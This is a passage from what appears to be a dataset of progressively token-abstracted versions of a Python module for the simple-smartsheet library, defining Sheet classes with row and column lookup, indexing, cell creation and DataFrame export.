where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: 
List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n 
\"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SheetSchema(CoreSchema):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n <function token>\n\n\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n 
self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title 
%s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
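The same listing also defines column access: get_column works either by case-sensitive title or by numeric id (passing neither raises ValueError), and _update_column_lookup only logs duplicate titles before overwriting the title-to-column mapping, so the last column with a given title wins. A minimal sketch, assuming a populated Sheet and a hypothetical 'Status' column:

def column_lookup_examples(sheet):
    # Lookup by title is case-sensitive and uses the _column_title_to_column map.
    status_col = sheet.get_column("Status")
    # Lookup by id uses _column_id_to_column and should return the same object.
    same_col = sheet.get_column(column_id=status_col.id)
    return status_col, same_col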
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where 
key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f'Index {columns} is non-unique and lookup will potentially return multiple rows, use get_rows method instead'\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict['index'])\n return index[query]\n else:\n raise ValueError(\n 'Either row_num or row_id argument should be provided')\n\n def get_rows(self, filter: Dict[str, Any]) ->List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f'Index {columns} is not found, build it first with build_index method'\n )\n unique = index_dict['unique']\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\n 'index'])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(Dict[Tuple[Any, ...], List[RowT]],\n index_dict['index'])\n return non_unique_index.get(query, [])\n\n def get_column(self, column_title: Optional[str]=None, column_id:\n Optional[int]=None) ->ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n 'Either column_title or column_id argument should be provided')\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where 
key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n 